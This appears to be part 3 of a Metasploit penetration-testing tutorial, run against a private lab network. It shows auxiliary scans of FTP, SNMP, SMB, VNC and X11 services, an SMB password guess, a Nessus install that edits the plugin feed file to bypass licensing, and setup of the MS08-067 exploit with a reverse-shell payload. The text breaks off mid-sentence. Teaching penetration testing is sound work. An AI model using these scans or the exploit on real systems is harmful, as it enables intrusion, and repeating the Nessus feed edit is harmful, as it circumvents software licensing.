Metasploit-based software penetration testing (Part 3)

Using auxiliary modules

Auxiliary modules

Listing the module directory
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
total 108
drwxr-xr-x 47 root root  4096 Jun 24 17:25 admin
drwxr-xr-x  2 root root  4096 Jun 24 20:36 analyze
drwxr-xr-x  2 root root  4096 Jun 24 20:36 bnat
drwxr-xr-x  8 root root  4096 Jun 24 17:25 client
drwxr-xr-x  4 root root  4096 Jun 24 17:25 cloud
drwxr-xr-x  2 root root  4096 Jun 24 20:36 crawler
drwxr-xr-x  2 root root  4096 Jun 24 20:36 docx
drwxr-xr-x 27 root root  4096 Jun 24 17:25 dos
-rwxr-xr-x  1 root root  1473 Jun 16 23:59 example.py
-rw-r--r--  1 root root  1708 Jun 16 23:59 example.rb
drwxr-xr-x  2 root root  4096 Jun 24 20:36 fileformat
drwxr-xr-x 10 root root  4096 Jun 24 17:25 fuzzers
drwxr-xr-x  2 root root 24576 Jun 24 20:36 gather
drwxr-xr-x  2 root root  4096 Jun 24 20:36 parser
drwxr-xr-x  3 root root  4096 Jun 24 17:25 pdf
drwxr-xr-x 87 root root  4096 Jun 24 17:25 scanner
drwxr-xr-x  4 root root  4096 Jun 24 20:36 server
drwxr-xr-x  2 root root  4096 Jun 24 20:36 sniffer
drwxr-xr-x  9 root root  4096 Jun 24 17:25 spoof
drwxr-xr-x  5 root root  4096 Jun 24 17:25 sqli
drwxr-xr-x  2 root root  4096 Jun 24 20:36 voip
drwxr-xr-x  5 root root  4096 Jun 24 17:25 vsploit


Listing the modules
msf6 > show auxiliary

Auxiliary
=========

   #   Name                                                       Disclosure Date  Rank    Check  Description
   -   ----                                                       ---------------  ----    -----  -----------
   0   auxiliary/admin/2wire/xslt_password_reset                  2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   1   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal  No     Android Browser RCE Through Google Play Store XFO
   2   auxiliary/admin/appletv/appletv_display_image                               normal  No     Apple TV Image Remote Control
   3   auxiliary/admin/appletv/appletv_display_video                               normal  No     Apple TV Video Remote Control
   4   auxiliary/admin/atg/atg_client                                              normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   5   auxiliary/admin/aws/aws_launch_instances                                    normal  No     Launches Hosts in AWS
   6   auxiliary/admin/backupexec/dump                                             normal  No     Veritas Backup Exec Windows Remote File Access
   7   auxiliary/admin/backupexec/registry                                         normal  No     Veritas Backup Exec Server Registry Access
   8   auxiliary/admin/chromecast/chromecast_reset                                 normal  No     Chromecast Factory Reset DoS
   9   auxiliary/admin/chromecast/chromecast_youtube                               normal  No     Chromecast YouTube Remote Control
   10  auxiliary/admin/db2/db2rcmd                                2004-03-04       normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
   11  auxiliary/admin/dcerpc/cve_2020_1472_zerologon                              normal  Yes    Netlogon Weak Cryptographic Authentication
   ...


Loading an auxiliary module


msf6 > use auxiliary/scanner/http/webdav_scanner


Case: finding exposed SQL Server instances
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
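The run above prints only "Scanned 1 of 1 hosts" because mssql_ping never touches TCP/1433: it speaks the SQL Server Resolution Protocol (SSRP) to the SQL Server Browser service on UDP/1434, and a host whose Browser service is stopped, or whose UDP/1434 is filtered, stays silent even if SQL Server is listening. Setting THREADS to 100 against a single RHOST changes nothing either, since the option is capped at one thread per host. The Ruby script below is an added example, not Metasploit's implementation of the module: it sends the same one-byte request, parses the SVR_RESP record format the Browser service answers with, and embeds a constructed response so it runs offline (the host name is the one smb_version later reports for 192.168.0.106; the version string and ports are invented).

```ruby
require 'socket'
require 'timeout'

# SSRP (UDP/1434, served by the SQL Server Browser service). A one-byte
# CLNT_UCAST_EX (0x03) request asks the Browser to list every instance on
# the host. SVR_RESP is: 0x05, uint16 little-endian length, then a string of
# "key;value;key;value;..." records, each terminated by ";;".
SSRP_CLNT_UCAST_EX = "\x03".b
SSRP_SVR_RESP      = 0x05

# Parse one SVR_RESP datagram into an array of {field => value} hashes.
def parse_ssrp_response(datagram)
  data = datagram.b
  raise ArgumentError, 'not an SSRP SVR_RESP' unless data.getbyte(0) == SSRP_SVR_RESP
  len  = data[1, 2].to_s.unpack1('v')
  body = data[3, len.to_i]
  raise ArgumentError, 'truncated SSRP response' if len.nil? || body.nil? || body.bytesize < len
  body.split(';;').reject(&:empty?).map do |record|
    fields = record.split(';', -1)
    raise ArgumentError, 'malformed instance record' if fields.size.odd?
    fields.each_slice(2).to_h
  end
end

# Send the probe and parse the answer. Returns [] when nothing answers, which
# is what mssql_ping's silence means: no Browser service on UDP/1434, or the
# port is filtered. A SQL Server listening only on TCP/1433 is invisible here.
def ssrp_probe(host, port: 1434, timeout: 3)
  sock = UDPSocket.new
  sock.send(SSRP_CLNT_UCAST_EX, 0, host, port)
  datagram = Timeout.timeout(timeout) { sock.recvfrom(65_535).first }
  parse_ssrp_response(datagram)
rescue Timeout::Error
  []
ensure
  sock&.close
end

# Constructed SVR_RESP for a host advertising two instances. The host name is
# the one smb_version reported for 192.168.0.106; version and ports are invented.
SAMPLE_SVR_RESP = begin
  body = 'ServerName;DESKTOP-9A8VFKB;InstanceName;MSSQLSERVER;IsClustered;No;Version;15.0.2000.5;tcp;1433;;' \
         'ServerName;DESKTOP-9A8VFKB;InstanceName;SQLEXPRESS;IsClustered;No;Version;15.0.2000.5;tcp;49172;;'
  [SSRP_SVR_RESP, body.bytesize].pack('Cv') + body
end

if __FILE__ == $PROGRAM_NAME
  target = ARGV[0]
  instances = target ? ssrp_probe(target) : parse_ssrp_response(SAMPLE_SVR_RESP)
  instances.each do |i|
    puts format('%-16s %-12s version %-12s tcp/%s',
                i['ServerName'], i['InstanceName'], i['Version'], i['tcp'] || '-')
  end
end
```

Run it with a target address (the file name is a placeholder): `ruby ssrp_probe.rb 192.168.0.106`; with no argument it prints the constructed sample. An empty result against a host that smb_version or http_version already confirmed alive is the cue to try TCP/1433 directly (mssql_login) rather than to conclude there is no SQL Server.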


Protocol scans

SSH scan
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)
[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


FTP scan
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)
[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Conclusion: the FTP service on 192.168.0.161 allows anonymous login (read access).


SNMP scan
snmp_login tries every community string in its wordlist (the PASS_FILE option, which defaults to a list of common community names) against each host; a run with no [+] lines, as below, means none of them was accepted.
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned  50 of 256 hosts (19% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


ARP scan
arp_sweep only sees hosts on the attacker's own layer-2 segment; the vendor in parentheses comes from the MAC address OUI.
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.106 appears to be up (UNKNOWN).
[+] 192.168.0.150 appears to be up (VMware, Inc.).
[+] 192.168.0.151 appears to be up (UNKNOWN).
[+] 192.168.0.152 appears to be up (UNKNOWN).
[+] 192.168.0.158 appears to be up (UNKNOWN).
[+] 192.168.0.159 appears to be up (UNKNOWN).
[+] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


HTTP service scan
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.0.1:80
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  55 of 256 hosts (21% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


SMB scan

SMB (Server Message Block) is a communication protocol specified by Microsoft and Intel in 1987, used mainly as the communication protocol of Microsoft networks. It operates at the session and presentation layers, with a small part in the application layer.


SMB uses the NetBIOS application programming interface (API). It is also an open protocol that permits extensions, which has made it large and complex: there are roughly 65 top-level commands, each with more than 120 sub-functions, and even Windows NT does not implement all of them. Microsoft later (in 1996) renamed SMB to CIFS (Common Internet File System) and added many new features.


SMB is used for communication between clients and servers. It was originally designed by Barry Feigenbaum at IBM, with the aim of turning the local DOS file-access interface (INT 21h) into a network file system.


msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


Vulnerability scanning

Nexpose

# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
# chmod a+x NeXposeSetup-Linux64.bin
# ./NeXposeSetup-Linux64.bin
# cd /opt/rapid7/nexpose/nsc
# ./nsc


Once the login page at https://127.0.0.1:3780/ comes up, the installation is complete.


Nessus

Reference: https://blog.csdn.net/qq_51577576/article/details/123211031

1) Download: https://www.tenable.com/downloads/nessus

2) dpkg -i Nessus-10.2.0-debian9_amd64.deb

3) systemctl start nessusd.service

4) Open https://127.0.0.1:8834/

5) Stop the service: systemctl stop nessusd.service

6) # gedit /opt/nessus/var/nessus/plugin_feed_info.inc

7) Add the following content:
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";

8)
# cd /opt/nessus/var/nessus/
# mkdir plugins
# cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/

9) Update the plugin set from a local archive
https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u
# /opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz
msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns

Hosts
=====

address        svcs  vulns
-------        ----  -----
192.168.0.1    2     14
192.168.0.106  23    76
192.168.0.150  6     46
192.168.0.151  4     28
192.168.0.155  3     2
192.168.0.157  4     29
192.168.0.158  10    37


address: IP address

svcs: number of services detected

vulns: number of vulnerabilities Nessus found

Show all vulnerabilities

msf6 > vulns
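The hosts -c address,svcs,vulns table is what Metasploit's importer makes of the .nessus file. Nessus XML v2 is plain XML: one ReportHost per address, one ReportItem per plugin result with port, protocol, svc_name, severity (0 = informational up to 4 = critical), pluginID and pluginName attributes. The Ruby parser below is an added example, not Metasploit's importer, and it applies its own counting rule (an assumption, stated in the code): services are distinct port/protocol pairs with a port other than 0, and vulns counts every plugin result, informational ones included, which is why imported Nessus vuln counts look large. The embedded sample is a constructed .nessus document with made-up plugin IDs and names.

```ruby
require 'rexml/document'

SEVERITY = %w[info low medium high critical].freeze

# Summarise a .nessus (Nessus XML v2) export per host: distinct services,
# number of plugin results, and results grouped by severity.
# Assumption: a service is a (port, protocol) pair with port != 0 (port 0 is
# a host-level plugin), and every ReportItem counts as one result.
def parse_nessus(xml)
  doc = REXML::Document.new(xml)
  summary = {}
  doc.root.elements.each('Report/ReportHost') do |host|
    ip = host.attributes['name']
    services = {}
    findings = []
    host.elements.each('ReportItem') do |item|
      a = item.attributes
      port, proto = a['port'].to_i, a['protocol']
      services[[port, proto]] = a['svc_name'] if port > 0
      findings << { plugin: a['pluginID'], name: a['pluginName'],
                    severity: a['severity'].to_i, port: port, proto: proto }
    end
    summary[ip] = {
      svcs: services.size,
      vulns: findings.size,
      by_severity: findings.group_by { |f| SEVERITY[f[:severity]] }.transform_values(&:size),
      findings: findings
    }
  end
  summary
end

# Findings at or above a severity level, as [ip, port/proto, plugin name].
def findings_at_least(summary, level)
  min = SEVERITY.index(level)
  summary.flat_map do |ip, s|
    s[:findings].select { |f| f[:severity] >= min }
                .map { |f| [ip, "#{f[:port]}/#{f[:proto]}", f[:name]] }
  end
end

# Rows in the shape of `hosts -c address,svcs,vulns`.
def hosts_rows(summary)
  summary.map { |ip, s| format('%-15s %4d %6d', ip, s[:svcs], s[:vulns]) }
end

# Constructed .nessus sample: two hosts, made-up plugin IDs (9000xx) and names.
SAMPLE_NESSUS = <<~XML
  <?xml version="1.0" ?>
  <NessusClientData_v2>
    <Report name="constructed_scan">
      <ReportHost name="192.168.0.161">
        <HostProperties><tag name="operating-system">Linux</tag></HostProperties>
        <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="900001" pluginName="Constructed: OS identification"/>
        <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="0" pluginID="900002" pluginName="Constructed: FTP banner"/>
        <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="2" pluginID="900003" pluginName="Constructed: anonymous FTP enabled"/>
        <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0" pluginID="900004" pluginName="Constructed: SMB detection"/>
        <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3" pluginID="900005" pluginName="Constructed: SMB signing not required"/>
      </ReportHost>
      <ReportHost name="192.168.0.106">
        <ReportItem port="80" svc_name="www" protocol="tcp" severity="0" pluginID="900006" pluginName="Constructed: HTTP server type"/>
        <ReportItem port="1434" svc_name="mssql" protocol="udp" severity="0" pluginID="900007" pluginName="Constructed: SQL Browser detection"/>
      </ReportHost>
    </Report>
  </NessusClientData_v2>
XML

if __FILE__ == $PROGRAM_NAME
  summary = parse_nessus(ARGV[0] ? File.read(ARGV[0]) : SAMPLE_NESSUS)
  puts hosts_rows(summary)
  findings_at_least(summary, 'medium').each { |row| puts row.join('  ') }
end
```

Against the page's own export the call is `parse_nessus(File.read('/home/jerry/jerry_01sqgv.nessus'))`; findings_at_least(summary, 'high') is the list worth carrying into the targeted scans that follow.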


Targeted vulnerability scans

Checking SMB logins
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/smb/smb_login) > run


Scanning for VNC servers with no authentication

VNC (Virtual Network Computing) is a remote-control tool developed at AT&T Laboratories Cambridge (formerly the Olivetti & Oracle Research Lab). It is free, open-source software for UNIX/Linux systems with strong, efficient remote-control capabilities that compare with any remote-control software on Windows or macOS. On Linux, VNC consists of four commands: vncserver, vncviewer, vncpasswd and vncconnect; in most cases only two of them are needed, vncserver and vncviewer.

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run


Scanning for open X11 servers

X11, also called the X Window System (X11 or simply X), is a bitmap-display windowing system. It is the standard toolkit and protocol for building graphical user interfaces on Unix and Unix-like operating systems and on OpenVMS, and it has been ported to almost every modern operating system. In the run below, the [-] Access Denied line means an X server answered on 6000/tcp but has access control enabled; open_x11 prints a [+] line only for servers that accept the unauthenticated connection.

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000    - 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


Starting the penetration test


Common msf6 commands

msf6 > show exploits    (lists all exploit modules)

msf6 > show exploits

Exploits
========

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/aix/local/ibstat_path                        2013-09-24       excellent  Yes    ibstat $PATH Privilege Escalation
   1  exploit/aix/local/xorg_x11_server                    2018-10-25       great      Yes    Xorg X11 Server Local Privilege Escalation
   2  exploit/aix/rpc_cmsd_opcode21                        2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   3  exploit/aix/rpc_ttdbserverd_realpath                 2009-06-17       great      No     ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   4  exploit/android/adb/adb_server_exec                  2016-01-01       excellent  Yes    Android ADB Debug Server Remote Payload Execution
   5  exploit/android/browser/samsung_knox_smdm_url        2014-11-12       excellent  No     Samsung Galaxy KNOX Android Browser RCE
   6  exploit/android/browser/stagefright_mp4_tx3g_64bit   2015-08-13       normal     No     Android Stagefright MP4 tx3g Integer Overflow
   ...


msf6 > show auxiliary    (lists all auxiliary modules; output as in the earlier section)


msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 > search mysql

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > show payloads


Showing the payloads compatible with a module

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads


Selecting a payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   ...
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)


Showing more detail than show targets

msf6 exploit(windows/smb/ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm
  Brett Moore <brett.moore@insomniasec.com>
  frank2
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  ...
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization code of
  NetAPI32.dll through the Server Service. This module is capable of bypassing
